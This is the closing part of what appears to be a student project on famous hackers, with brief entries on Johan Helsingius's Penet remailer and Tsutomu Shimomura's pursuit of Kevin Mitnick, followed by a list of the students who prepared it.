Johan Helsingius -- Operated the world's most popular anonymous remailer, the Penet remailer (called penet.fi), until he closed up shop in September 1996.

Tsutomu Shimomura -- Shimomura outhacked and outsmarted Kevin Mitnick, the United States' most infamous hacker, in early 1995.


PREPARED BY

• NIKHIL KHANDELWAL (Leader, Supervisor, Page Designer)

• RAHUL GUPTA (Assistant Leader, Editor, Page Designer)

• ARPIT GARG (Main Source Collector, Page Designer)

• MRIGESH BHANDARI (Source Collector)

• SHIKHA AGARWAL (Source Collector)

• NEHA JAIN (Source Collector)

• MANISH PUROHIT (Source Collector)
